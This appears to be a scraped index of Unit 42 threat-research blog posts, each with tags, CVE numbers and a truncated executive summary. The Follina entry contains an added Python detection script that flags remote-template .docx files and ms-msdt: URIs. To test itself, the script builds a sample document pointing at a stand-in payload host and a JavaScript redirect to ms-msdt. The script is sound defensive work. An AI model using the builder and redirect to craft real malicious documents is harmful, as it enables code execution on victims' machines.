CVE-2022-27924
CVE-2022-30136
CVE-2022-31137
CVE-2022-44877
CVE-2022-46169
Exploit in the wild
Network security trends
## Executive Summary
Recent observations of exploits used in the wild November 2022-January 2023 reveal that attackers have been using newly published remote code execution vulnerabilities in the following three products:
Roxy-WI, a web interface for managing and monitoring RoxyDNS
CWP, a free web hosting control panel (aka Control Web Panel or CentOS Web Panel)
Cacti, an open-source netw
Unit42
blogs_unit42·2023-03-31·CVSS 9.8
CVE-2023-23397 [CRITICAL]
## Threat Brief - CVE-2023-23397 - Microsoft Outlook Privilege Escalation
Unit 42
Published: March 31, 2023
High Profile Threats
Threat Research
Vulnerabilities
CVE-2023-23397
Email compromise
Microsoft Outlook
Microsoft Vulnerability
## Executive Summary
On March 14, 2023, Microsoft released a patch for CVE-2023-23397. CVE-2023-23397 is a vulnerability in the Windows Microsoft Outlook client that can be exploited by sending a specially crafted email that triggers automatically when it is processed by the Outlook client. No user interaction is required to trigger the exploit.
Exploitation of the vulnerability will leak the targeted user’s Net-NTLMv2 hashes. This could then be used to conduct relay attacks to ot
Unit42
blogs_unit42·2023-02-15·CVSS 7.5
[HIGH]
## Mirai Variant V3G4 Targets IoT Devices
Chao Lei
Zhibin Zhang
Cecilia Hu
Aveek Das
Published: February 15, 2023
Threat Research
Vulnerabilities
Botnet
IoT Vulnerability
Mirai variant
V3G4
## Content Warning
We are providing a content warning because the following contains usage of a racial slur by a threat actor, which is not condoned in any instance by Unit 42. Unit 42 has partially redacted the racial slur to provide researchers with the ability to identify it and check IoCs as needed.
## Executive Summary
From July to December 2022, Unit 42 researchers observed a Mirai variant called V3G4, which was leveraging several vulnerabilities to spread itself. The vulnerabilities exploited include the following:
CV
Unit42
blogs_unit42·2023-01-24·CVSS 9.8
CVE-2021-35394 [CRITICAL]
## Realtek SDK Vulnerability Attacks Highlight IoT Supply Chain Threats
Yiheng An
Chao Lei
Adam Robbie
Aveek Das
Zhibin Zhang
Shehroze Farooqi
Published: January 24, 2023
Threat Research
Vulnerabilities
Botnet
CVE-2021-35394
Exploit in the wild
IoT Vulnerability
Network security trends
Supply chain
## Executive Summary
Unit 42 researchers review tens of millions of attack records every month, and most months, attacks targeting a single vulnerability do not exceed 10% of the total number of attacks. However, we discovered that between August and October 2022, the number of attacks attempting to exploit a Realtek Jungle SDK remote code execution vulnerability (CVE-2021-35394) accounted for more than 40% of the
Unit42
blogs_unit42·2023-01-12·CVSS 9.8
[CRITICAL]
## Network Security Trends: August-October 2022
Yiheng An
Published: January 12, 2023
Trend Reports
Vulnerabilities
Attack analysis
Exploit in the wild
Network security trends
Proof of Concept
## Executive Summary
Recent August-October 2022 observations of exploits used in the wild reveal that threat actors have been leveraging significant numbers of attacks against the Realtek Jungle SDK remote code execution vulnerability (CVE-2021-35394).
In our observations of network security trends, Unit 42 researchers have pinpointed several attacks based on proof-of-concept (PoC) availability and impact. We have detailed below which of these we believe should be on a defender’s radar.
Other insights that could assist defenders
Unit42
blogs_unit42·2023-01-09
CVE-2022-23529
## Security Issue in JWT Secret Poisoning (Updated)
Artur Oleyarsh
Published: January 9, 2023
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
CVE-2022-23529
Exploit
Open source
Remote Code Execution
Vulnerability Exploitation
## Updates
Jan. 30, 2023
After hearing the community's feedback about the prerequisites of the exploitation scenario of the vulnerability, we made the decision to work with Auth0 to retract CVE-2022-23529.
The security issue described in this blog remains a concern when the JsonWebToken library is used in an insecure way. In that scenario, if all the prerequisites are met, the issue may be exploitable. We agree that the source of this risk in that case will be in the
Unit42
blogs_unit42·2022-12-23·CVSS 8.8
CVE-2022-41080 [HIGH]
## Threat Brief: OWASSRF Vulnerability Exploitation
Robert Falcone
Lior Rochberger
Published: December 22, 2022
High Profile Threats
Vulnerabilities
Backdoor
CVE-2022-41080
CVE-2022-41082
Microsoft Exchange Server
OWASSRF
ProxyNotShell
SilverArrow
## Executive Summary
On Dec. 20, 2022, CrowdStrike published a blog discussing a new exploit method for Microsoft Exchange Server, which they named OWASSRF, referring to server-side request forgery in relation to Outlook on the web. (Outlook on the web is known as both Outlook Web Access and Outlook Web Application.)
The OWASSRF exploit method involves two different vulnerabilities tracked by CVE-2022-41080 and CVE-2022-41082 that allow remote code execution (RCE) v
Unit42
blogs_unit42·2022-12-06·CVSS 7.8
CVE-2021-1675 [HIGH]
## Vice Society: Profiling a Persistent Threat to the Education Sector
JR Gumarin
Published: December 6, 2022
Ransomware
Threat Research
Vulnerabilities
CVE-2021-1675
CVE-2021-34527
HelloKitty
NGFW
PrintNightmare
Twinkling Scorpius
Vice Society
## Executive Summary
Vice Society is a ransomware gang that has been involved in high-profile activity against schools this year. Unlike many other ransomware groups such as LockBit that follow a typical ransomware-as-a-service (RaaS) model, Vice Society’s operations are different in that they’ve been known for using forks of pre-existing ransomware families in their attack chain that are sold on DarkWeb marketplaces. These include the HelloKitty (aka FiveHands) and Zeppelin stra
Unit42
blogs_unit42·2022-11-16
## Network Security Trends: May-July 2022
Yiheng An
Published: November 16, 2022
Trend Reports
Vulnerabilities
Attack analysis
Exploit in the wild
Network security trends
## Executive Summary
Recent May-July 2022 observations of network security trends and exploits used in the wild reveal that attackers have been making use of newly published remote code execution vulnerabilities. In our observations of network security trends, Unit 42 researchers have pinpointed several attacks based on proof-of-concept (PoC) availability and impact. We have detailed below which of these we believe should be on the defender’s radar.
Other insights that could assist defenders include the following:
Rankings of the most commonly used att
Unit42
blogs_unit42·2022-11-10·CVSS 5.8
CVE-2022-0072 [MEDIUM]
## Unit 42 Finds Three Vulnerabilities in OpenLiteSpeed Web Server
Artur Avetisyan
Published: November 10, 2022
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Containers
CVE-2022-0072
CVE-2022-0073
CVE-2022-0074
Exploit
Openlitespeed
Privilege escalation
Remote Code Execution
Web server
## Executive Summary
The Unit 42 research team has researched and discovered three different vulnerabilities in the open source OpenLiteSpeed Web Server. These vulnerabilities also affect the enterprise version, LiteSpeed Web Server. By chaining and exploiting the vulnerabilities, adversaries could compromise the web server and gain fully privileged remote code execution. The vulnerabilities discovered include:
Re
Unit42
blogs_unit42·2022-11-03·CVSS 7.5
CVE-2022-3786 [HIGH]
## Threat Brief: CVE-2022-3786 and CVE-2022-3602: OpenSSL X.509 Buffer Overflows
Shawn Westfall
Published: November 2, 2022
High Profile Threats
Vulnerabilities
Buffer Overflow
CVE-2022-3602
CVE-2022-3786
Network security
OpenSSL
## Executive Summary
On November 1, 2022, OpenSSL released a security advisory describing two high severity vulnerabilities within the OpenSSL library (CVE-2022-3786 and CVE-2022-3602). OpenSSL versions from 3.0.0 - 3.0.6 are vulnerable, with 3.0.7 containing the patch for both vulnerabilities. OpenSSL 1.1.1 and 1.0.2 are not affected by this issue.
In the days leading up to the security advisory, many were saying these vulnerabilities had the potential to be as bad as the Heartbleed
Unit42
blogs_unit42·2022-10-04·CVSS 6.6
CVE-2022-41040 [MEDIUM]
## Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell)
Shawn Westfall
Published: October 4, 2022
High Profile Threats
Vulnerabilities
CVE-2022-41040
CVE-2022-41082
Exploit in the wild
Microsoft Exchange Server
ProxyNotShell
Threat intelligence
## Executive Summary
In early August, GTSC discovered a new Microsoft Exchange zero-day remote code execution (RCE) that was very similar to ProxyShell (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207).
The exploit was discovered in the wild in what appeared to be a SOC investigation into suspicious activity of one of GTSC’s customers. Once they determined the scope of the vulnerabilities, GTSC reported the vulnerability to the Zer
Unit42
blogs_unit42·2022-09-16
## Zero-Day Exploit Detection Using Machine Learning
Jin Chen
Lei Xu
Andrew Guan
Zhibin Zhang
Yu Fu
Published: September 16, 2022
Threat Research
Vulnerabilities
Command injection
Deep learning
Machine Learning
Network security
SQL injection
Threat detection
Zero-days
## Executive Summary
Code injection is an attack technique widely used by threat actors to launch arbitrary code execution on victim machines through vulnerable applications. In 2021, the Open Web Application Security Project (OWASP) ranked it as third in the top 10 web application security risks.
Given the popularity of code injection in exploits, signatures with pattern matches are commonly used to identify the anomalies in network traffic (mos
Unit42
blogs_unit42·2022-09-06·CVSS 9.8
CVE-2015-2051 [CRITICAL]
## Mirai Variant MooBot Targeting D-Link Devices
Chao Lei
Zhibin Zhang
Cecilia Hu
Aveek Das
Published: September 6, 2022
Malware
Threat Research
Vulnerabilities
CVE-2015-2051
CVE-2018-6530
CVE-2022-26258
CVE-2022-28958
IoT
Mirai
MooBot
SOHO
## Executive Summary
In early August, Unit 42 researchers discovered attacks leveraging several vulnerabilities in devices made by D-Link, a company that specializes in network and connectivity products. The vulnerabilities exploited include:
CVE-2015-2051: D-Link HNAP SOAPAction Header Command Execution Vulnerability
CVE-2018-6530: D-Link SOAP Interface Remote Code Execution Vulnerability
CVE-2022-26258: D-Link Remote Command Execution Vulnerability
CVE-2022-28958:
Unit42
blogs_unit42·2022-08-19·CVSS 8.8
CVE-2021-20166 [HIGH]
## Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
Yue Guan
Published: August 19, 2022
Trend Reports
Vulnerabilities
Attack analysis
CVE-2021-20166
CVE-2021-20167
CVE-2021-21881
CVE-2021-24762
CVE-2021-28169
CVE-2021-31589
CVE-2021-39226
CVE-2021-4045
CVE-2021-43711
CVE-2022-21371
CVE-2022-21662
CVE-2022-22536
CVE-2022-22947
CVE-2022-22954
CVE-2022-22963
CVE-2022-22965
CVE-2022-24112
CVE-2022-24260
CVE-2022-25060
CVE-2022-25075
CVE-2022-25134
CVE-2022-27226
CVE-2022-29464
Exploit in the wild
Network security trends
## Executive Summary
Recent observations of exploits used in the wild reveal that attackers have been making use
Unit42
blogs_unit42·2022-07-27·CVSS 9.8
CVE-2022-26809 [CRITICAL]
## Threat Brief: Microsoft Critical Vulnerabilities (CVE-2022-26809, CVE-2022-26923, CVE-2022-26925)
Chao Lei
Tao Yan
Haozhe Zhang
Qi Deng
Published: July 27, 2022
High Profile Threats
Vulnerabilities
CVE-2022-26809
CVE-2022-26923
CVE-2022-26925
Microsoft
Microsoft Windows
## Executive Summary
Microsoft introduced patches for several critical vulnerabilities in their April and May 2022 security updates, including the following vulnerabilities:
CVE-2022-26809: An unauthorized attacker can exploit this vulnerability by sending a specially crafted Remote Procedure Call (RPC) to remotely execute arbitrary code on the vulnerable device.
CVE-2022-26923: A low-privileged user can escalate privilege to a domain ad
Unit42
blogs_unit42·2022-07-26
## Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report
Unit 42
Published: July 26, 2022
Trend Reports
Vulnerabilities
Apache Log4j
ProxyLogon
ProxyShell
SonicWall RCE
Unit 42 Incident Response Report
Zero-day
Zoho ManageEngine
## Executive Summary
Software vulnerabilities remain a key avenue of initial access for attackers according to the 2022 Unit 42 Incident Response Report . While this underscores the need for organizations to operate with a well-defined patch management strategy, we’ve observed that attackers are increasingly quick to exploit high-profile zero-day vulnerabilities, further increasing the time pressure on organizations when a new vulnera
Unit42
## Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
blogs_unit42·2022-07-21·CVSS 9.8·CVE-2017-5638 [CRITICAL]
Unit 42
Published: July 21, 2022
Trend Reports
Vulnerabilities
Apache Log4j
CVE-2017-5638
CVE-2017-9841
CVE-2018-19986
CVE-2019-02320
CVE-2019-19597
CVE-2019-9082
CVE-2020-14882
CVE-2020-14883
CVE-2020-15505
CVE-2020-15506
CVE-2020-25078
CVE-2020-5902
CVE-2021-21315
CVE-2021-22986
CVE-2021-26855
CVE-2021-31805
CVE-2021-34473
CVE-2021-35464
CVE-2021-38647
CVE-2021-40438
CVE-2021-40539
CVE-2021-41773
CVE-2021-42013
CVE-2021-44228
CVE-2021-45046
CVE-2022-22963
CVE-2022-22965
Network security trends
Unit 42 Network Threat Trends Research Report
## Executive Summary
Tens of thousands of vulnerabilities are repo
Unit42
## FabricScape: Escaping Service Fabric and Taking Over the Cluster
blogs_unit42·2022-06-28·CVSS 6.7·CVE-2022-30137 [MEDIUM]
Aviv Sasson
Published: June 28, 2022
Threat Research
Vulnerabilities
Azure
Container escape
Containers
Fabricscape
Privilege escalation
Service Fabric
## Executive Summary
Unit 42 researchers identified FabricScape (CVE-2022-30137), a vulnerability of important severity in Microsoft’s Service Fabric – commonly used with Azure – that allows Linux containers to escalate their privileges in order to gain root privileges on the node, and then compromise all of the nodes in the cluster. The vulnerability could be exploited on containers that are configured to have runtime access, which is granted by default to every container.
Service Fabric hosts more
Unit42
## Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134) (Updated)
blogs_unit42·2022-06-04·CVSS 9.8·CVE-2022-26134 [CRITICAL]
Abhishek Anbazhagan
Shawn Westfall
Josh Grunzweig
Daniela Shalev
Eli Barr
Published: June 3, 2022
High Profile Threats
Threat Research
Vulnerabilities
Confluence Server and Data Center
CVE-2022-26134
Remote Code Execution
## Executive Summary
On June 2, Volexity reported that over Memorial Day weekend, they identified suspicious activity on two internet-facing servers running Atlassian’s Confluence Server application. After analysis of the compromise, Volexity determined the initial foothold was the result of a remote code execution vulnerability in Confluence Server and Data Center. The details were reported t
Unit42
## Threat Brief: CVE-2022-30190 – MSDT Code Execution Vulnerability
blogs_unit42·2022-05-31·CVSS 7.8·CVE-2022-30190 [HIGH]
Shawn Westfall
Published: May 31, 2022
High Profile Threats
Vulnerabilities
CVE-2022-30190
Follina
Microsoft Office
Remote Code Execution
Zero-click
## Executive Summary
On May 27, 2022, details began to emerge of malicious Word documents leveraging remote templates to execute PowerShell via the ms-msdt Office URL protocol. The use of this technique appeared to allow attackers to bypass local Office macro policies to execute code within the context of Word. Microsoft has since released protection guidance and assigned CVE-2022-30190 to this vulnerability.
Due to the amount of publicly available information, ease of use, and the extreme effective
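The delivery chain summarized above (a Word document whose attached template is fetched from a remote host, with the fetched content handing off to the ms-msdt: URL protocol) leaves two static artifacts a defender can check for. The following is an added example, not code from Unit 42 or Microsoft: it builds a constructed minimal .docx in memory, flags any External attachedTemplate relationship in the package's .rels parts, and extracts ms-msdt: URIs from template content. The template URL, the HTML body and the MSDT parameter value are constructed placeholders, not an observed payload.

```python
"""Static checks for the Follina delivery chain: a .docx whose settings
relationship points Word at an external (remote) template, and template
content that redirects to the ms-msdt: URL protocol.

Added example; the sample document, URL and HTML below are constructed."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
ATTACHED_TEMPLATE = OFFICE_REL + "attachedTemplate"

# Constructed placeholder: where the sample document tells Word to fetch its template.
SAMPLE_TEMPLATE_URL = "http://template.example/payload.html"

# Constructed template body: a JavaScript redirect to the ms-msdt: scheme.
# The /param value is a harmless placeholder, not an observed payload.
SAMPLE_TEMPLATE_HTML = """<html><body><script>
window.location.href = 'ms-msdt:/id PCWDiagnostic /skip force /param "IT_BrowseForFile=placeholder"';
</script></body></html>"""

# A quoted string literal whose value begins with the ms-msdt: scheme.
MSDT_LITERAL_RE = re.compile(r"""(["'])(ms-msdt:.*?)\1""", re.IGNORECASE | re.DOTALL)


def find_external_templates(docx_bytes):
    """Return (rels_part, target) for every External attachedTemplate
    relationship in the package. A legitimate local template is Internal;
    an External target is fetched over the network when the file opens."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if (rel.get("TargetMode", "Internal") == "External"
                        and rel.get("Type") == ATTACHED_TEMPLATE):
                    hits.append((name, rel.get("Target", "")))
    return hits


def find_msdt_uris(template_text):
    """Return ms-msdt: URIs found as string literals in fetched template
    content. Obfuscated payloads (hex escapes, string concatenation) evade
    this; treat the external-template hit as the primary signal."""
    return [m.group(2) for m in MSDT_LITERAL_RE.finditer(template_text)]


def build_sample_docx(remote_template):
    """Constructed minimal .docx package for testing. With remote_template=True,
    word/_rels/settings.xml.rels carries an External attachedTemplate."""
    def relationships(*rels):
        body = "".join(
            f'<Relationship Id="rId{i}" Type="{t}" Target="{target}"'
            + (' TargetMode="External"' if external else "") + "/>"
            for i, (t, target, external) in enumerate(rels, 1))
        return f'<Relationships xmlns="{REL_NS}">{body}</Relationships>'

    settings_rels = (relationships((ATTACHED_TEMPLATE, SAMPLE_TEMPLATE_URL, True))
                     if remote_template else relationships())
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("_rels/.rels",
                    relationships((OFFICE_REL + "officeDocument", "word/document.xml", False)))
        zf.writestr("word/_rels/document.xml.rels",
                    relationships((OFFICE_REL + "settings", "settings.xml", False)))
        zf.writestr("word/document.xml", f'<w:document xmlns:w="{w_ns}"><w:body/></w:document>')
        zf.writestr("word/settings.xml", f'<w:settings xmlns:w="{w_ns}"/>')
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


def scan(docx_bytes, fetched_template=None):
    """Combine both checks into one verdict."""
    templates = find_external_templates(docx_bytes)
    msdt = find_msdt_uris(fetched_template) if fetched_template else []
    return {"external_templates": templates, "msdt_uris": msdt,
            "suspicious": bool(templates) or bool(msdt)}


if __name__ == "__main__":
    for flag in (True, False):
        result = scan(build_sample_docx(flag), SAMPLE_TEMPLATE_HTML if flag else None)
        print("remote template" if flag else "local only", "->", result)
```

The relationship check is the robust half: it does not depend on fetching anything and works on mail-gateway or file-share scans of the document itself. The ms-msdt: literal match is only a baseline, since the fetched HTML is attacker-controlled and trivially obfuscated; Microsoft's published mitigation for CVE-2022-30190 (disabling the MSDT URL protocol handler) removes the sink regardless of how the URI is encoded.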
Unit42
## Network Security Trends: November 2021 to January 2022
blogs_unit42·2022-05-31
Yue Guan
Published: May 31, 2022
Threat Research
Vulnerabilities
Apache Log4j
Attack analysis
Denial of service
Exploit in Wild
Network security trends
## Executive Summary
Unit 42 researchers continually observe network attacks and search for insights that can assist defenders. Here, we summarize key trends from November 2021 to January 2022. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity distribution. We also classify vulnerabilities to provide a clear view of the prevalence of, for example, cross-site scripting or denial of service.
Cross-site scripting stood out as a commonly used t
Unit42
## Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
blogs_unit42·2022-05-20·CVSS 9.8·CVE-2022-22954 [CRITICAL]
Ruchna Nigam
Published: May 20, 2022
High Profile Threats
Vulnerabilities
CVE-2022-22954
CVE-2022-22960
CVE-2022-22972
CVE-2022-22973
VMware
## Executive Summary
On April 6, 2022, VMware published a security advisory mentioning eight vulnerabilities, including CVE-2022-22954 and CVE-2022-22960 impacting their products VMware Workspace ONE Access, Identity Manager and vRealize Automation. On April 13, they updated their advisory with information that CVE-2022-22954 is being exploited in the wild.
Multiple writeups detailing exploitation scenarios for the aforementioned two vulnerabilities were published in the last week of A
Unit42
## Threat Brief: CVE-2022-1388
blogs_unit42·2022-05-10·CVSS 9.8·CVE-2022-1388 [CRITICAL]
Unit 42
Published: May 10, 2022
High Profile Threats
Vulnerabilities
BIG-IP
CVE-2022-1388
## Executive Summary
On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControlREST component of its BIG-IP product tracked in CVE-2022-1388. Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems. This is a critical vulnerability that needs immediate attention, as it was given a 9.8 CVSS score. Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun.
Palo Alto Networks released a Threat Prevention si
Unit42
## AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation
blogs_unit42·2022-04-19·CVSS 8.8·CVE-2021-3100 [HIGH]
Yuval Avrahami
Published: April 19, 2022
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Apache Log4j
AWS
Container escape
Containers
CVE-2021-3100
CVE-2021-3101
CVE-2021-44228
CVE-2022-0070
CVE-2022-0071
Log4j
Privilege escalation
## Executive Summary
Following Log4Shell , AWS released several hot patch solutions that monitor for vulnerable Java applications and Java containers and patch them on the fly. Each solution suits a different environment, covering standalone servers, Kubernetes clusters, Elastic Container Service (ECS) clusters and Fargate. The hot patches aren't exclusive to AWS environment
Unit42
## CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated)
blogs_unit42·2022-03-31·CVSS 9.8·CVE-2022-22965 [CRITICAL]
Haozhe Zhang
Ken Hsu
Tao Yan
Qi Deng
Robert Falcone
Published: March 31, 2022
High Profile Threats
Vulnerabilities
CVE-2022-22963
CVE-2022-22965
Exploit in the wild
Remote Code Execution
SpringShell
## Executive Summary
Recently, two vulnerabilities were announced within the Spring Framework, an open-source framework for building enterprise Java applications. On March 29, 2022, the Spring Cloud Expression Resource Access Vulnerability tracked in CVE-2022-22963 was patched with the release of Spring Cloud Function 3.1.7 and 3.2.3. Two days later on March 31, 2022, Spring released version 5.3.18 and
Unit42
## CVE-2021-28372: How a Vulnerability in Third-Party Technology Is Leaving Many IP Cameras and Surveillance Systems Vulnerable
blogs_unit42·2022-03-17·CVSS 8.3·CVE-2021-28372 [HIGH]
Aveek Das
Sultan Omurzakov
Jun Du
Published: March 17, 2022
Threat Research
Vulnerabilities
Attack surface
CVE-2021-28372
IoT
IP camera
Supply chain
## Executive Summary
A large number of IP cameras and surveillance systems used in enterprise networks were recently discovered to be vulnerable to remote code execution and information leakage due to CVE-2021-28372, a vulnerability in the built-in ThroughTek Kalay P2P software development kit that is used by many of these devices. Many users of IP cameras and surveillance systems are unaware of the built-in software and TCP/IP stacks in their
Unit42
## Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
blogs_unit42·2022-03-08
Yuval Avrahami
Published: March 8, 2022
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Containers
## Executive Summary
In February 2021, Google announced Autopilot, a new mode of operation in Google Kubernetes Engine (GKE). With Autopilot, Google provides a "hands-off" Kubernetes experience, managing cluster infrastructure for the customer. The platform automatically provisions and removes nodes based on resource consumption and enforces secure Kubernetes best practices out of the box.
In June 2021, Unit 42 researchers disclosed several vulnerabilities and attack techniques in GKE Autopilot to Google. Users able to create a po
Unit42
## New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
blogs_unit42·2022-03-03·CVSS 7.8·CVE-2022-0492 [HIGH]
Yuval Avrahami
Published: March 3, 2022
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Containers
CVE-2022-0492
Linux
## Executive Summary
On Feb. 4, Linux announced CVE-2022-0492, a new privilege escalation vulnerability in the kernel. CVE-2022-0492 marks a logical bug in control groups (cgroups), a Linux feature that is a fundamental building block of containers. The issue stands out as one of the simplest Linux privilege escalations discovered in recent times: The Linux kernel mistakenly exposed a privileged operation to unprivileged users.
Fortunately, the default security hardenings in most container e
Unit42
## Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization
blogs_unit42·2022-03-02
Aveek Das
Published: March 2, 2022
Threat Research
Vulnerabilities
Healthcare
IoMT
IoT
## Executive Summary
Unit 42 recently set out to better understand how well hospitals and other healthcare providers are doing in securing smart infusion pumps, which are network-connected devices that deliver medications and fluids to patients. This topic is of critical concern because security lapses in these devices have the potential to put lives at risk or expose sensitive patient data.
We reviewed crowdsourced data from scans of more than 200,000 infusion pumps on the networks of hospitals and other healthcare organizations using IoT Security for
Unit42
## SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors
blogs_unit42·2022-02-24·CVSS 10.0·CVE-2021-28799 [CRITICAL]
Unit 42
Published: February 24, 2022
Malware
Threat Research
Vulnerabilities
Advanced Persistent Threat
Backdoor
CVE-2021-28799
CVE-2021-40539
CVE-2021-44077
TiltedTemple
Windows
## Executive Summary
Unit 42 has been tracking an APT campaign we name TiltedTemple, which we first identified in connection with its use of the Zoho ManageEngine ADSelfService Plus vulnerability CVE-2021-40539 and ServiceDesk Plus vulnerability CVE-2021-44077. The threat actors involved use a variety of techniques to gain access to and persistence in compromised systems and have successfully compromised more than a dozen organizations across the technology,
Unit42
## Threat Brief: Ongoing Russia and Ukraine Cyber Activity
blogs_unit42·2022-01-20·CVSS 8.2·CVE-2021-32648 [HIGH]
Robert Falcone
Mike Harbison
Josh Grunzweig
Published: January 20, 2022
High Profile Threats
Malware
Vulnerabilities
CVE-2021-32648
OctoberCMS
Russia
Ukraine
WhisperGate
Windows
## Executive Summary
Beginning on Jan. 14, 2022, reports emerged of a series of attacks targeting numerous Ukrainian government websites, leaving many of them defaced or inaccessible. The government of Ukraine formally accused Russia of masterminding the attacks.
A day later, public reporting outlined new malware called WhisperGate that originally was observed on Jan.
Unit42
## Network Security Trends: August-October 2021
blogs_unit42·2021-12-21·CVSS 9.8·CVE-2021-24499 [CRITICAL]
Yue Guan
Published: December 21, 2021
Trend Reports
Vulnerabilities
Attack analysis
Buffer Overflow
Command injection
Cross-site request forgery
Cross-site scripting
CVE-2021-24499
CVE-2021-26084
CVE-2021-32789
CVE-2021-33357
CVE-2021-33766
CVE-2021-34473
CVE-2021-35395
CVE-2021-38647
CVE-2021-40438
CVE-2021-40870
CVE-2021-41773
CVE-2021-42013
Denial of service
Directory traversal
Exploit in the wild
Improper authentication
Information disclosure
Memory corruption
Network security trends
Out-of-bounds read
Privilege escalation
Remote Code Execution
Security feature bypass
SQL injection
## Executive Summary
Unit 42 researchers continually observe net
Unit42
## Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated)
blogs_unit42·2021-12-10·CVSS 9.8·CVE-2021-44228 [CRITICAL]
Tao Yan
Qi Deng
Haozhe Zhang
Yu Fu
Josh Grunzweig
Mike Harbison
Robert Falcone
Published: December 10, 2021
Threat Research
Vulnerabilities
Apache Log4j
CVE-2017-5645
CVE-2019-17571
CVE-2021-44228
CVE-2021-44832
CVE-2021-45046
CVE-2021-45105
Denial of service
Exploit
Log4j
Log4j 2
RCE
## Executive Summary
On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache Log4j 2 was identified being exploited in the wild. Public proof of concept (PoC) code was released and subsequent investigation revealed that exploitation was incredibly easy to perform. By submitting a specially crafted request to a vu
Unit42
## Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer
blogs_unit42·2021-11-08
Robert Falcone
Jeff White
Peter Renals
Published: November 7, 2021
Nation-State Cyberattacks
Threat Research
Vulnerabilities
Advanced Persistent Threat
Backdoor
Credential Harvesting
Credential stealer
KdcSponge
ManageEngine
NGLite
TiltedTemple
Trojan
Zoho ManageEngine
## Executive Summary
On Sept. 16, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released an alert warning that advanced persistent threat (APT) actors were actively exploiting newly identified vulnerabilities in a self-service password management and single sign-on solution known as
Unit42
## Network Security Trends: May-July 2021
blogs_unit42·2021-09-17
Yue Guan
Lei Xu
Published: September 17, 2021
Malware
Trend Reports
Vulnerabilities
Attack analysis
Exploit
Exploit in the wild
Network security trends
## Executive Summary
Unit 42 researchers continue to observe network security trends, tracking how cybercriminals take advantage of vulnerabilities in the real world. The following sections present our analysis of the most recently published vulnerabilities, including their severity and category distribution. Additionally, we provide insight into how the vulnerabilities are exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls. We highlight vulnerabilities ranked medium sever
Unit42
## Threat Brief: OMI Vulnerabilities (CVE-2021-38645, CVE-2021-38647, CVE-2021-38648 and CVE-2021-38649)
blogs_unit42·2021-09-16·CVSS 7.8·CVE-2021-38645 [HIGH]
Nathaniel Quist
Published: September 16, 2021
Cloud Cybersecurity Research
High Profile Threats
Vulnerabilities
Azure
CVE-2021-38645
CVE-2021-38647
CVE-2021-38648
CVE-2021-38649
OMI
OMIGOD
## Executive Summary
On Sept. 14, 2021, Microsoft’s Security Response Center (MSRC) released security patches detailing the findings of four critical vulnerabilities affecting the Microsoft Azure package Open Management Infrastructure (OMI). The open-source OMI package is designed to provide a portable infrastructure backbone for web-based management tools, such as diagnostic monitoring, log analytic services and automat
Unit42
## Finding Azurescape – Cross-Account Container Takeover in Azure Container Instances
blogs_unit42·2021-09-09·CVSS 2.6·CVE-2018-1002102 [LOW]
Yuval Avrahami
Published: September 9, 2021
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Azure
Azurescape
Cloud Security
Containers
CVE-2018-1002102
CVE-2019-5736
Kubernetes
RunC
## Executive Summary
Azure Container Instances (ACI) is Azure's Container-as-a-Service (CaaS) offering, enabling customers to run containers on Azure without managing the underlying servers. Unit 42 researchers recently identified and disclosed critical security issues in ACI to Microsoft. A malicious Azure user could have exploited these issues to execute code on other users' containers, steal customer secrets and images dep
Unit42
## Threat Brief: CVE-2021-26084
blogs_unit42·2021-09-03·CVSS 9.8·CVE-2021-26084 [CRITICAL]
Unit 42
Published: September 3, 2021
High Profile Threats
Vulnerabilities
CVE-2021-26084
## Executive Summary
On Aug. 25, 2021, Atlassian released a security advisory for an injection vulnerability in Confluence Server and Data Center, CVE-2021-26084. If the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems. Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun. Unit 42 recommends customers upgrade to the latest release of Confluence Server and Data Center.
## Vulnerable Systems
The Atlassian products vulnerable to CVE-2021-260
Unit42
## New Mirai Variant Targets WebSVN Command Injection Vulnerability (CVE-2021-32305)
